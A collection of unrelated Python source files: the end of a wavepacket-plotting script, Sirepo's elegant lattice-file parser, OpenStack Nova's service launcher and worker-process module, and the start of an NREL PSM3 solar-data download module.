values_m = [ wave_m[j,...] for j in xrange(parameters["ncomponents"]) ]
have_mother_data = True
except ValueError:
have_mother_data = False
# Retrieve spawn data
try:
wave_s = iom.load_wavefunction(timestep=step, blockid=bidc)
values_s = [ wave_s[j,...] for j in xrange(parameters["ncomponents"]) ]
have_spawn_data = True
except ValueError:
have_spawn_data = False
# Plot the probability densities projected to the eigenbasis
fig = figure(figsize=imgsize)
# Create a bunch of subplots
axes = []
for index, component in enumerate(values_m):
ax = fig.add_subplot(parameters["ncomponents"],1,index+1)
ax.ticklabel_format(style="sci", scilimits=(0,0), axis="y")
axes.append(ax)
# Plot original Wavefunction
if have_mother_data is True:
for index, component in enumerate(values_m):
if plotcomponents is True:
axes[index].plot(grid, real(component))
axes[index].plot(grid, imag(component))
axes[index].set_ylabel(r"$\Re \varphi_"+str(index)+r", \Im \varphi_"+str(index)+r"$")
if plotabssqr is True:
axes[index].plot(grid, component*conj(component))
axes[index].set_ylabel(r"$\langle \varphi_"+str(index)+r"| \varphi_"+str(index)+r"\rangle$")
if plotphase is True:
plotcf(grid, angle(component), component*conj(component))
axes[index].set_ylabel(r"$\langle \varphi_"+str(index)+r"| \varphi_"+str(index)+r"\rangle$")
# Overlay spawned parts
if have_spawn_data is True:
for index, component in enumerate(values_s):
axes[index].plot(grid, component*conj(component), "-r")
axes[index].set_ylabel(r"$\langle \varphi_"+str(index)+r"| \varphi_"+str(index)+r"\rangle$")
# Set the axis properties
for index in xrange(len(values_m)):
axes[index].set_xlabel(r"$x$")
# Set the aspect window
if view is not None:
axes[index].set_xlim(view[:2])
axes[index].set_ylim(view[2:])
fig.suptitle(r"$\Psi$ at time $"+str(step*parameters["dt"])+r"$")
fig.savefig("wavefunction_"+ (5-len(str(step)))*"0"+str(step) +GD.output_format)
close(fig)
print(" Plotting frames finished")
def plot_frames_split(iom, gid=0, view=None, plotphase=True, plotcomponents=False, plotabssqr=False, imgsize=(12,9)):
"""Plot the wave function for a series of timesteps.
:param iom: An ``IOManager`` instance providing the simulation data.
:param gid: The group ID of the group where the two packets are stored.
:param view: The aspect ratio.
:param plotphase: Whether to plot the complex phase. (slow)
:param plotcomponents: Whether to plot the real/imaginary parts..
:param plotabssqr: Whether to plot the absolute value squared.
"""
parameters = iom.load_parameters()
n = parameters["ncomponents"]
# Block IDs for mother and child wavepacket
bidm, bidc = iom.get_block_ids(groupid=gid)
grid = iom.load_grid(blockid="global")
# Precompute eigenvectors for efficiency
Potential = PotentialFactory().create_potential(parameters)
eigenvectors = Potential.evaluate_eigenvectors_at(grid)
timegrid = iom.load_wavefunction_timegrid(blockid=bidm)
for step in timegrid:
print(" Timestep # " + str(step))
# Split grid
gl = grid[grid<=X0]
gr = grid[grid>X0]
# Retrieve spawn data for both packets and split the data as necessary
try:
wave_m = iom.load_wavefunction(timestep=step, blockid=bidm)
values_m = [ wave_m[j,...] for j in xrange(parameters["ncomponents"]) ]
yl = values_m[0][grid<=X0]
yr = values_m[0][grid>X0]
have_mother_data = True
except ValueError:
have_mother_data = False
# Retrieve spawn data
try:
wave_s = iom.load_wavefunction(timestep=step, blockid=bidc)
values_s = [ wave_s[j,...] for j in xrange(parameters["ncomponents"]) ]
ysl = values_s[0][grid<=X0]
ysr = values_s[0][grid>X0]
have_spawn_data = True
except ValueError:
have_spawn_data = False
# Plot the probability densities projected to the eigenbasis
fig = figure(figsize=imgsize)
# Plot the probability density, left to X0
ax1 = fig.add_subplot(1,2,1)
ax1.ticklabel_format(style="sci", scilimits=(0,0), axis="y")
# mother
if have_mother_data is True:
plotcf(gl, angle(yl), conj(yl)*yl)
# spawned
if have_spawn_data is True:
plot(gl, conj(ysl)*ysl, "-r")
if view is not None:
ax1.set_xlim(view[0],0)
ax1.set_ylim(view[2:4])
ax1.set_xlabel(r"$x \le 0$")
ax1.set_ylabel(r"$\langle\varphi |\varphi \rangle$")
# Plot the probability density, right to X0
ax2 = fig.add_subplot(1,2,2)
ax2.ticklabel_format(style="sci", scilimits=(0,0), axis="y")
# mother
if have_mother_data is True:
plotcf(gr, angle(yr), conj(yr)*yr)
# spawned
if have_spawn_data is True:
plot(gr, conj(ysr)*ysr, "-r")
if view is not None:
ax2.set_xlim(0, view[1])
ax2.set_ylim(view[4:])
ax2.set_xlabel(r"$x > 0$")
ax2.set_ylabel(r"$\langle\varphi |\varphi \rangle$")
fig.suptitle(r"Time $"+str(step*parameters["dt"])+r"$")
fig.savefig("wavepackets_"+ (5-len(str(step)))*"0"+str(step) +GD.output_format)
close(fig)
print(" Plotting frames finished")
if __name__ == "__main__":
iom = IOManager()
# Read file with simulation data
try:
iom.open_file(filename=sys.argv[1])
except IndexError:
iom.open_file()
# Enable splitted axes view
split = True
if split is True:
# Where on the x axis to split the view
X0 = 0.0
# The axes rectangle that is plotted
view = [-15, 15, 0.0, 1.5, 0.0, 0.05]
plot_frames_split(iom, view=view, plotphase=True, plotcomponents=False, plotabssqr=False)
else:
# The axes rectangle that is plotted
view = [-8.5, 8.5, -0.1, 1.5]
plot_frames(iom, view=view, plotphase=True, plotcomponents=False, plotabssqr=False)
iom.finalize()
|
|
# -*- coding: utf-8 -*-
u"""elegant lattice parser
:copyright: Copyright (c) 2015 RadiaSoft LLC. All Rights Reserved.
:license: http://www.apache.org/licenses/LICENSE-2.0.html
"""
from __future__ import absolute_import, division, print_function
from pykern import pkresource
from pykern.pkcollections import PKDict
from pykern.pkdebug import pkdc, pkdlog, pkdp
from sirepo import simulation_db
from sirepo.template import code_variable
from sirepo.template import elegant_common
from sirepo.template import elegant_lattice_parser
from sirepo.template import lattice
import math
import ntpath
import operator
import re
import sirepo.sim_data
import subprocess
_IGNORE_FIELD = [
'mpi_io_write_buffer_size',
'rootname',
'search_path',
'semaphore_file',
]
_SIM_DATA, SIM_TYPE, _SCHEMA = sirepo.sim_data.template_globals('elegant')
_ELEGANT_TYPE_RE = re.compile(r'^[A-Z]+$')
_ELEGANT_TYPES = set(n for n in _SCHEMA.model if _ELEGANT_TYPE_RE.search(n))
def elegant_code_var(variables):
_PI = 4 * math.atan(1)
class _P(code_variable.PurePythonEval):
_OPS = PKDict({
'<': operator.lt,
'>': operator.gt,
'beta.p': lambda a: a / (math.sqrt((1 + (a * a)))),
'dacos': lambda a: math.acos(a) * 180 / _PI,
'dasin': lambda a: math.asin(a) * 180 / _PI,
'datan': lambda a: math.atan(a) * 180 / _PI,
'dcos': lambda a: math.cos(a * _PI / 180),
'dsin': lambda a: math.sin(a * _PI / 180),
'dtan': lambda a: math.tan(a * _PI / 180),
'gamma.beta': lambda a: 1 / math.sqrt(1 - (a * a)),
'gamma.p': lambda a: math.sqrt(1 + (a * a)),
# TODO(e-carlin): Should not need lambda.
# https://bugs.python.org/issue29299
'ln': lambda a: math.log(a),
'mod': operator.mod,
'mult': operator.mul,
'p.beta': lambda a: a / math.sqrt(1 - (a * a)),
'p.gamma': lambda a: math.sqrt((a * a) - 1),
'sqr': lambda a: a * a,
**code_variable.PurePythonEval._OPS
})
def eval_var(self, expr, depends, variables):
if re.match(r'^\{.+\}$', expr):
# It is a shell command
return expr, None
return super().eval_var(expr, depends, variables)
return code_variable.CodeVar(
variables,
_P(
constants=PKDict(
c_gs=2.99792458e10,
c_mks=2.99792458e8,
e_cgs=4.80325e-10,
e_mks=1.60217733e-19,
hbar_MeVs=6.582173e-22,
hbar_mks=1.0545887e-34,
kb_cgs=1.380658e-16,
kb_mks=1.380658e-23,
me_cgs=9.1093897e-28,
me_mks=9.1093897e-31,
mev=0.51099906,
mp_mks=1.6726485e-27,
pi=_PI,
re_cgs=2.81794092e-13,
re_mks=2.81794092e-15,
),
),
)
def import_file(text, data=None, update_filenames=True):
if not data:
data = simulation_db.default_data(elegant_common.SIM_TYPE)
models = elegant_lattice_parser.parse_file(
text,
data.models.rpnVariables,
lattice.LatticeUtil.max_id(data),
)
name_to_id, default_beamline_id = _create_name_map(models)
if 'default_beamline_name' in models and models['default_beamline_name'] in name_to_id:
default_beamline_id = name_to_id[models['default_beamline_name']]
element_names = PKDict()
rpn_cache = PKDict()
code_var = elegant_code_var(models.rpnVariables)
for el in models['elements']:
el['type'] = _validate_type(el, element_names)
element_names[el['name'].upper()] = el
validate_fields(el, rpn_cache, code_var, update_filenames)
for bl in models['beamlines']:
bl['items'] = _validate_beamline(bl, name_to_id, element_names)
if len(models['elements']) == 0 or len(models['beamlines']) == 0:
raise IOError('no beamline elements found in file')
data['models']['elements'] = models['elements']
data['models']['beamlines'] = models['beamlines']
data['models']['rpnVariables'] = models['rpnVariables']
lattice.LatticeUtil(data, _SCHEMA).sort_elements_and_beamlines()
if default_beamline_id:
data['models']['simulation']['activeBeamlineId'] = default_beamline_id
data['models']['simulation']['visualizationBeamlineId'] = default_beamline_id
# used by synergia app to get values for rpn expressions
data['models']['rpnCache'] = rpn_cache
return data
def validate_fields(el, rpn_cache, code_var=None, update_filenames=True):
if code_var is None:
code_var = elegant_code_var([])
for field in el.copy():
_validate_field(el, field, rpn_cache, code_var, update_filenames)
model_name = lattice.LatticeUtil.model_name_for_data(el)
for field in _SCHEMA['model'][model_name]:
if field not in el:
el[field] = _SCHEMA['model'][model_name][field][2]
def _create_name_map(models):
name_to_id = PKDict()
last_beamline_id = None
for bl in models['beamlines']:
name_to_id[bl['name'].upper()] = bl['id']
last_beamline_id = bl['id']
for el in models['elements']:
name_to_id[el['name'].upper()] = el['_id']
return name_to_id, last_beamline_id
def _field_type_for_field(el, field):
if re.search(r'\[\d+\]$', field):
field = re.sub(r'\[\d+\]$', '', field)
field_type = None
model_name = lattice.LatticeUtil.model_name_for_data(el)
for f in _SCHEMA['model'][model_name]:
if f == field:
field_type = _SCHEMA['model'][model_name][f][1]
break
if not field_type:
if not field in _IGNORE_FIELD:
pkdlog('{}: unknown field type for {}', field, model_name)
del el[field]
return field_type
def _strip_file_prefix(value, model, field):
return re.sub(r'^{}-{}\.'.format(model, field), '', value)
def _validate_beamline(bl, name_to_id, element_names):
items = []
for name in bl['items']:
is_reversed = False
if re.search(r'^-', name):
is_reversed = True
name = re.sub(r'^-', '', name)
if name.upper() not in name_to_id:
raise IOError('{}: unknown beamline item name'.format(name))
id = name_to_id[name.upper()]
if name.upper() in element_names:
items.append(id)
else:
items.append(-id if is_reversed else id)
return items
def _validate_enum(el, field, field_type):
search = el[field].lower()
exact_match = ''
close_match = ''
for v in _SCHEMA['enum'][field_type]:
if v[0] == search:
exact_match = v[0]
break
if search.startswith(v[0]) or v[0].startswith(search):
close_match = v[0]
if exact_match:
el[field] = exact_match
elif close_match:
el[field] = close_match
else:
raise IOError('{} unknown value: "{}"'.format(field, search))
def _validate_field(el, field, rpn_cache, code_var, update_filenames):
if field in ['_id', '_type']:
return
if '_type' not in el and field == 'type':
return
field_type = _field_type_for_field(el, field)
if not field_type:
return
if update_filenames:
if field_type == 'OutputFile':
el[field] = '1'
elif field_type == 'InputFile':
el[field] = ntpath.basename(el[field])
if field_type == "InputFileXY":
_validate_input_file(el, field)
elif (field_type == 'RPNValue' or field_type == 'RPNBoolean') and \
code_var.is_var_value(el[field]):
_validate_rpn_field(el, field, rpn_cache, code_var)
elif field_type.endswith('StringArray'):
_validate_string_array_field(el, field)
elif field_type in _SCHEMA['enum']:
_validate_enum(el, field, field_type)
elif 'type' in el and el['type'] == 'SCRIPT' and field == 'command':
_validate_script(el)
# Input files may have been from a sirepo export. Strip the sirepo file prefix if present.
if field_type.startswith('InputFile'):
el[field] = _strip_file_prefix(
el[field], lattice.LatticeUtil.model_name_for_data(el), field)
elif field_type == 'BeamInputFile':
el[field] = ntpath.basename(el[field])
el[field] = _strip_file_prefix(el[field], 'bunchFile', 'sourceFile')
def _validate_input_file(el, field):
# <filename>=<x>+<y>
fullname= ntpath.basename(el[field])
m = re.search(r'^(.*?)\=(.*?)\+(.*)$', fullname)
if m:
el[field] = m.group(1)
el[field + 'X'] = m.group(2)
el[field + 'Y'] = m.group(3)
else:
el[field] = fullname
def _validate_rpn_field(el, field, rpn_cache, code_var):
if '_type' in el:
# command model
m = re.search(r'\((.*?)\)$', el[field])
if m:
el[field] = m.group(1)
m = re.search(r'\{\s*rpnl\s+(.*)\}$', el[field])
if m:
el[field] = m.group(1)
return
el[field] = re.sub(r'\s+', ' ', el[field]).strip()
value, error = code_var.eval_var(el[field])
if error:
raise IOError(f'invalid rpn="{el[field]}" error="{error}"')
rpn_cache[el[field]] = value
def _validate_script(el):
# ex, command: 'sddscombine %i beam1.sdds -merge %o'
v = el['command']
if v:
m = re.search(r'(\w+)\b', v, re.IGNORECASE)
if m:
executable = m.group(1)
try:
import distutils.spawn
if not distutils.spawn.find_executable(executable):
el['commandFile'] = executable
except Exception as e:
pass
m = re.search(r'\b(\w+\.sdds)\b', v, re.IGNORECASE)
if m:
el['commandInputFile'] = m.group(1)
def _validate_string_array_field(el, field):
m = re.search(r'(.*?)\[(\d+)\]$', field)
if not m:
return
value = el[field]
del el[field]
field = m.group(1)
index = int(m.group(2))
if not field in el:
model_name = lattice.LatticeUtil.model_name_for_data(el)
el[field] = _SCHEMA['model'][model_name][field][2]
value_array = re.split(r'\s*,\s*', el[field])
m = re.search(r'^(\d+)\*(.*)$', value)
if m:
count = int(m.group(1))
val = m.group(2)
for i in range(count):
value_array[index + i] = val
else:
values = re.split(r'\s*,\s*', value)
for v in values:
value_array[index] = v
index += 1
el[field] = ', '.join(value_array)
def _validate_type(el, element_names):
type = el['type'].upper()
match = None
for el_type in _ELEGANT_TYPES:
if type.startswith(el_type) or el_type.startswith(type):
if match:
raise IOError('{}: type name matches multiple element types'.format(type))
match = el_type
if not el_type:
raise IOError('{}: unknown element type'.format(type))
if not match:
# type may refer to another element
if el['type'] in element_names:
el_copy = element_names[el['type'].upper()]
for field in el_copy.copy():
if field not in el:
el[field] = el_copy[field]
match = el_copy['type']
else:
raise IOError('{}: element not found'.format(type))
return match
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Generic Node base class for all workers that run on hosts."""
import errno
import inspect
import os
import random
import signal
import sys
import time
import eventlet
import greenlet
from oslo.config import cfg
from nova import conductor
from nova import context
from nova import exception
from nova.openstack.common import eventlet_backdoor
from nova.openstack.common import importutils
from nova.openstack.common import log as logging
from nova.openstack.common import loopingcall
from nova.openstack.common import rpc
from nova import servicegroup
from nova import utils
from nova import version
from nova import wsgi
LOG = logging.getLogger(__name__)
service_opts = [
cfg.IntOpt('report_interval',
default=10,
help='seconds between nodes reporting state to datastore'),
cfg.BoolOpt('periodic_enable',
default=True,
help='enable periodic tasks'),
cfg.IntOpt('periodic_fuzzy_delay',
default=60,
help='range of seconds to randomly delay when starting the'
' periodic task scheduler to reduce stampeding.'
' (Disable by setting to 0)'),
cfg.ListOpt('enabled_apis',
default=['ec2', 'osapi_compute', 'metadata'],
help='a list of APIs to enable by default'),
cfg.ListOpt('enabled_ssl_apis',
default=[],
help='a list of APIs with enabled SSL'),
cfg.StrOpt('ec2_listen',
default="0.0.0.0",
help='IP address for EC2 API to listen'),
cfg.IntOpt('ec2_listen_port',
default=8773,
help='port for ec2 api to listen'),
cfg.IntOpt('ec2_workers',
default=None,
help='Number of workers for EC2 API service'),
cfg.StrOpt('osapi_compute_listen',
default="0.0.0.0",
help='IP address for OpenStack API to listen'),
cfg.IntOpt('osapi_compute_listen_port',
default=8774,
help='list port for osapi compute'),
cfg.IntOpt('osapi_compute_workers',
default=None,
help='Number of workers for OpenStack API service'),
cfg.StrOpt('metadata_manager',
default='nova.api.manager.MetadataManager',
help='OpenStack metadata service manager'),
cfg.StrOpt('metadata_listen',
default="0.0.0.0",
help='IP address for metadata api to listen'),
cfg.IntOpt('metadata_listen_port',
default=8775,
help='port for metadata api to listen'),
cfg.IntOpt('metadata_workers',
default=None,
help='Number of workers for metadata service'),
cfg.StrOpt('compute_manager',
default='nova.compute.manager.ComputeManager',
help='full class name for the Manager for compute'),
cfg.StrOpt('console_manager',
default='nova.console.manager.ConsoleProxyManager',
help='full class name for the Manager for console proxy'),
cfg.StrOpt('cert_manager',
default='nova.cert.manager.CertManager',
help='full class name for the Manager for cert'),
cfg.StrOpt('network_manager',
default='nova.network.manager.VlanManager',
help='full class name for the Manager for network'),
cfg.StrOpt('scheduler_manager',
default='nova.scheduler.manager.SchedulerManager',
help='full class name for the Manager for scheduler'),
cfg.IntOpt('service_down_time',
default=60,
help='maximum time since last check-in for up service'),
]
CONF = cfg.CONF
CONF.register_opts(service_opts)
CONF.import_opt('host', 'nova.netconf')
class SignalExit(SystemExit):
def __init__(self, signo, exccode=1):
super(SignalExit, self).__init__(exccode)
self.signo = signo
class Launcher(object):
"""Launch one or more services and wait for them to complete."""
def __init__(self):
"""Initialize the service launcher.
:returns: None
"""
self._services = []
self.backdoor_port = eventlet_backdoor.initialize_if_enabled()
@staticmethod
def run_server(server):
"""Start and wait for a server to finish.
:param service: Server to run and wait for.
:returns: None
"""
server.start()
server.wait()
def launch_server(self, server):
"""Load and start the given server.
:param server: The server you would like to start.
:returns: None
"""
if self.backdoor_port is not None:
server.backdoor_port = self.backdoor_port
gt = eventlet.spawn(self.run_server, server)
self._services.append(gt)
def stop(self):
"""Stop all services which are currently running.
:returns: None
"""
for service in self._services:
service.kill()
def wait(self):
"""Waits until all services have been stopped, and then returns.
:returns: None
"""
for service in self._services:
try:
service.wait()
except greenlet.GreenletExit:
pass
class ServiceLauncher(Launcher):
def _handle_signal(self, signo, frame):
# Allow the process to be killed again and die from natural causes
signal.signal(signal.SIGTERM, signal.SIG_DFL)
signal.signal(signal.SIGINT, signal.SIG_DFL)
raise SignalExit(signo)
def wait(self):
signal.signal(signal.SIGTERM, self._handle_signal)
signal.signal(signal.SIGINT, self._handle_signal)
LOG.debug(_('Full set of CONF:'))
for flag in CONF:
flag_get = CONF.get(flag, None)
# hide flag contents from log if contains a password
# should use secret flag when switch over to openstack-common
if ("_password" in flag or "_key" in flag or
(flag == "sql_connection" and "mysql:" in flag_get)):
LOG.debug(_('%(flag)s : FLAG SET ') % locals())
else:
LOG.debug('%(flag)s : %(flag_get)s' % locals())
status = None
try:
super(ServiceLauncher, self).wait()
except SignalExit as exc:
signame = {signal.SIGTERM: 'SIGTERM',
signal.SIGINT: 'SIGINT'}[exc.signo]
LOG.info(_('Caught %s, exiting'), signame)
status = exc.code
except SystemExit as exc:
status = exc.code
finally:
self.stop()
rpc.cleanup()
if status is not None:
sys.exit(status)
class ServerWrapper(object):
def __init__(self, server, workers):
self.server = server
self.workers = workers
self.children = set()
self.forktimes = []
class ProcessLauncher(object):
def __init__(self):
self.children = {}
self.sigcaught = None
self.running = True
rfd, self.writepipe = os.pipe()
self.readpipe = eventlet.greenio.GreenPipe(rfd, 'r')
signal.signal(signal.SIGTERM, self._handle_signal)
signal.signal(signal.SIGINT, self._handle_signal)
def _handle_signal(self, signo, frame):
self.sigcaught = signo
self.running = False
# Allow the process to be killed again and die from natural causes
signal.signal(signal.SIGTERM, signal.SIG_DFL)
signal.signal(signal.SIGINT, signal.SIG_DFL)
def _pipe_watcher(self):
# This will block until the write end is closed when the parent
# dies unexpectedly
self.readpipe.read()
LOG.info(_('Parent process has died unexpectedly, exiting'))
sys.exit(1)
def _child_process(self, server):
# Setup child signal handlers differently
def _sigterm(*args):
signal.signal(signal.SIGTERM, signal.SIG_DFL)
raise SignalExit(signal.SIGTERM)
signal.signal(signal.SIGTERM, _sigterm)
# Block SIGINT and let the parent send us a SIGTERM
signal.signal(signal.SIGINT, signal.SIG_IGN)
# Reopen the eventlet hub to make sure we don't share an epoll
# fd with parent and/or siblings, which would be bad
eventlet.hubs.use_hub()
# Close write to ensure only parent has it open
os.close(self.writepipe)
# Create greenthread to watch for parent to close pipe
eventlet.spawn(self._pipe_watcher)
# Reseed random number generator
random.seed()
launcher = Launcher()
launcher.run_server(server)
def _start_child(self, wrap):
if len(wrap.forktimes) > wrap.workers:
# Limit ourselves to one process a second (over the period of
# number of workers * 1 second). This will allow workers to
# start up quickly but ensure we don't fork off children that
# die instantly too quickly.
if time.time() - wrap.forktimes[0] < wrap.workers:
LOG.info(_('Forking too fast, sleeping'))
time.sleep(1)
wrap.forktimes.pop(0)
wrap.forktimes.append(time.time())
pid = os.fork()
if pid == 0:
# NOTE(johannes): All exceptions are caught to ensure this
# doesn't fallback into the loop spawning children. It would
# be bad for a child to spawn more children.
status = 0
try:
self._child_process(wrap.server)
except SignalExit as exc:
signame = {signal.SIGTERM: 'SIGTERM',
signal.SIGINT: 'SIGINT'}[exc.signo]
LOG.info(_('Caught %s, exiting'), signame)
status = exc.code
except SystemExit as exc:
status = exc.code
except BaseException:
LOG.exception(_('Unhandled exception'))
status = 2
finally:
wrap.server.stop()
os._exit(status)
LOG.info(_('Started child %d'), pid)
wrap.children.add(pid)
self.children[pid] = wrap
return pid
def launch_server(self, server, workers=1):
wrap = ServerWrapper(server, workers)
LOG.info(_('Starting %d workers'), wrap.workers)
while self.running and len(wrap.children) < wrap.workers:
self._start_child(wrap)
def _wait_child(self):
try:
pid, status = os.wait()
except OSError as exc:
if exc.errno not in (errno.EINTR, errno.ECHILD):
raise
return None
if os.WIFSIGNALED(status):
sig = os.WTERMSIG(status)
LOG.info(_('Child %(pid)d killed by signal %(sig)d'), locals())
else:
code = os.WEXITSTATUS(status)
LOG.info(_('Child %(pid)d exited with status %(code)d'), locals())
if pid not in self.children:
LOG.warning(_('pid %d not in child list'), pid)
return None
wrap = self.children.pop(pid)
wrap.children.remove(pid)
return wrap
def wait(self):
"""Loop waiting on children to die and respawning as necessary."""
while self.running:
wrap = self._wait_child()
if not wrap:
continue
while self.running and len(wrap.children) < wrap.workers:
self._start_child(wrap)
if self.sigcaught:
signame = {signal.SIGTERM: 'SIGTERM',
signal.SIGINT: 'SIGINT'}[self.sigcaught]
LOG.info(_('Caught %s, stopping children'), signame)
for pid in self.children:
try:
os.kill(pid, signal.SIGTERM)
except OSError as exc:
if exc.errno != errno.ESRCH:
raise
# Wait for children to die
if self.children:
LOG.info(_('Waiting on %d children to exit'), len(self.children))
while self.children:
self._wait_child()
class Service(object):
"""Service object for binaries running on hosts.
A service takes a manager and enables rpc by listening to queues based
on topic. It also periodically runs tasks on the manager and reports
it state to the database services table."""
def __init__(self, host, binary, topic, manager, report_interval=None,
periodic_enable=None, periodic_fuzzy_delay=None,
periodic_interval_max=None, db_allowed=True,
*args, **kwargs):
self.host = host
self.binary = binary
self.topic = topic
self.manager_class_name = manager
# NOTE(russellb) We want to make sure to create the servicegroup API
# instance early, before creating other things such as the manager,
# that will also create a servicegroup API instance. Internally, the
# servicegroup only allocates a single instance of the driver API and
# we want to make sure that our value of db_allowed is there when it
# gets created. For that to happen, this has to be the first instance
# of the servicegroup API.
self.servicegroup_api = servicegroup.API(db_allowed=db_allowed)
manager_class = importutils.import_class(self.manager_class_name)
self.manager = manager_class(host=self.host, *args, **kwargs)
self.report_interval = report_interval
self.periodic_enable = periodic_enable
self.periodic_fuzzy_delay = periodic_fuzzy_delay
self.periodic_interval_max = periodic_interval_max
self.saved_args, self.saved_kwargs = args, kwargs
self.timers = []
self.backdoor_port = None
self.conductor_api = conductor.API(use_local=db_allowed)
self.conductor_api.wait_until_ready(context.get_admin_context())
def start(self):
verstr = version.version_string_with_package()
LOG.audit(_('Starting %(topic)s node (version %(version)s)'),
{'topic': self.topic, 'version': verstr})
self.basic_config_check()
self.manager.init_host()
self.model_disconnected = False
ctxt = context.get_admin_context()
try:
self.service_ref = self.conductor_api.service_get_by_args(ctxt,
self.host, self.binary)
self.service_id = self.service_ref['id']
except exception.NotFound:
self.service_ref = self._create_service_ref(ctxt)
if self.backdoor_port is not None:
self.manager.backdoor_port = self.backdoor_port
self.conn = rpc.create_connection(new=True)
LOG.debug(_("Creating Consumer connection for Service %s") %
self.topic)
self.manager.pre_start_hook(rpc_connection=self.conn)
rpc_dispatcher = self.manager.create_rpc_dispatcher(self.backdoor_port)
# Share this same connection for these Consumers
self.conn.create_consumer(self.topic, rpc_dispatcher, fanout=False)
node_topic = '%s.%s' % (self.topic, self.host)
self.conn.create_consumer(node_topic, rpc_dispatcher, fanout=False)
self.conn.create_consumer(self.topic, rpc_dispatcher, fanout=True)
# Consume from all consumers in a thread
self.conn.consume_in_thread()
self.manager.post_start_hook()
LOG.debug(_("Join ServiceGroup membership for this service %s")
% self.topic)
# Add service to the ServiceGroup membership group.
pulse = self.servicegroup_api.join(self.host, self.topic, self)
if pulse:
self.timers.append(pulse)
if self.periodic_enable:
if self.periodic_fuzzy_delay:
initial_delay = random.randint(0, self.periodic_fuzzy_delay)
else:
initial_delay = None
periodic = loopingcall.DynamicLoopingCall(self.periodic_tasks)
periodic.start(initial_delay=initial_delay,
periodic_interval_max=self.periodic_interval_max)
self.timers.append(periodic)
def _create_service_ref(self, context):
svc_values = {
'host': self.host,
'binary': self.binary,
'topic': self.topic,
'report_count': 0
}
service = self.conductor_api.service_create(context, svc_values)
self.service_id = service['id']
return service
def __getattr__(self, key):
manager = self.__dict__.get('manager', None)
return getattr(manager, key)
@classmethod
def create(cls, host=None, binary=None, topic=None, manager=None,
report_interval=None, periodic_enable=None,
periodic_fuzzy_delay=None, periodic_interval_max=None,
db_allowed=True):
"""Instantiates class and passes back application object.
:param host: defaults to CONF.host
:param binary: defaults to basename of executable
:param topic: defaults to bin_name - 'nova-' part
:param manager: defaults to CONF.<topic>_manager
:param report_interval: defaults to CONF.report_interval
:param periodic_enable: defaults to CONF.periodic_enable
:param periodic_fuzzy_delay: defaults to CONF.periodic_fuzzy_delay
:param periodic_interval_max: if set, the max time to wait between runs
"""
if not host:
host = CONF.host
if not binary:
binary = os.path.basename(inspect.stack()[-1][1])
if not topic:
topic = binary.rpartition('nova-')[2]
if not manager:
manager_cls = ('%s_manager' %
binary.rpartition('nova-')[2])
manager = CONF.get(manager_cls, None)
if report_interval is None:
report_interval = CONF.report_interval
if periodic_enable is None:
periodic_enable = CONF.periodic_enable
if periodic_fuzzy_delay is None:
periodic_fuzzy_delay = CONF.periodic_fuzzy_delay
service_obj = cls(host, binary, topic, manager,
report_interval=report_interval,
periodic_enable=periodic_enable,
periodic_fuzzy_delay=periodic_fuzzy_delay,
periodic_interval_max=periodic_interval_max,
db_allowed=db_allowed)
return service_obj
def kill(self):
"""Destroy the service object in the datastore."""
self.stop()
try:
self.conductor_api.service_destroy(context.get_admin_context(),
self.service_id)
except exception.NotFound:
LOG.warn(_('Service killed that has no database entry'))
def stop(self):
# Try to shut the connection down, but if we get any sort of
# errors, go ahead and ignore them.. as we're shutting down anyway
try:
self.conn.close()
except Exception:
pass
for x in self.timers:
try:
x.stop()
except Exception:
pass
self.timers = []
def wait(self):
for x in self.timers:
try:
x.wait()
except Exception:
pass
def periodic_tasks(self, raise_on_error=False):
"""Tasks to be run at a periodic interval."""
ctxt = context.get_admin_context()
return self.manager.periodic_tasks(ctxt, raise_on_error=raise_on_error)
def basic_config_check(self):
"""Perform basic config checks before starting processing."""
# Make sure the tempdir exists and is writable
try:
with utils.tempdir() as tmpdir:
pass
except Exception as e:
LOG.error(_('Temporary directory is invalid: %s'), e)
sys.exit(1)
class WSGIService(object):
"""Provides ability to launch API from a 'paste' configuration."""
def __init__(self, name, loader=None, use_ssl=False, max_url_len=None):
"""Initialize, but do not start the WSGI server.
:param name: The name of the WSGI server given to the loader.
:param loader: Loads the WSGI application using the given name.
:returns: None
"""
self.name = name
self.manager = self._get_manager()
self.loader = loader or wsgi.Loader()
self.app = self.loader.load_app(name)
self.host = getattr(CONF, '%s_listen' % name, "0.0.0.0")
self.port = getattr(CONF, '%s_listen_port' % name, 0)
self.workers = getattr(CONF, '%s_workers' % name, None)
self.use_ssl = use_ssl
self.server = wsgi.Server(name,
self.app,
host=self.host,
port=self.port,
use_ssl=self.use_ssl,
max_url_len=max_url_len)
# Pull back actual port used
self.port = self.server.port
self.backdoor_port = None
def _get_manager(self):
"""Initialize a Manager object appropriate for this service.
Use the service name to look up a Manager subclass from the
configuration and initialize an instance. If no class name
is configured, just return None.
:returns: a Manager instance, or None.
"""
fl = '%s_manager' % self.name
if fl not in CONF:
return None
manager_class_name = CONF.get(fl, None)
if not manager_class_name:
return None
manager_class = importutils.import_class(manager_class_name)
return manager_class()
def start(self):
"""Start serving this service using loaded configuration.
Also, retrieve updated port number in case '0' was passed in, which
indicates a random port should be used.
:returns: None
"""
if self.manager:
self.manager.init_host()
self.manager.pre_start_hook()
if self.backdoor_port is not None:
self.manager.backdoor_port = self.backdoor_port
self.server.start()
if self.manager:
self.manager.post_start_hook()
def stop(self):
"""Stop serving this API.
:returns: None
"""
self.server.stop()
def wait(self):
"""Wait for the service to stop serving this API.
:returns: None
"""
self.server.wait()
# NOTE(vish): the global launcher is to maintain the existing
# functionality of calling service.serve +
# service.wait
_launcher = None
def serve(server, workers=None):
global _launcher
if _launcher:
raise RuntimeError(_('serve() can only be called once'))
if workers:
_launcher = ProcessLauncher()
_launcher.launch_server(server, workers=workers)
else:
_launcher = ServiceLauncher()
_launcher.launch_server(server)
def wait():
_launcher.wait()
|
|
"""
Get PSM3 TMY
see https://developer.nrel.gov/docs/solar/nsrdb/psm3_data_download/
"""
import io
import requests
import pandas as pd
from json import JSONDecodeError
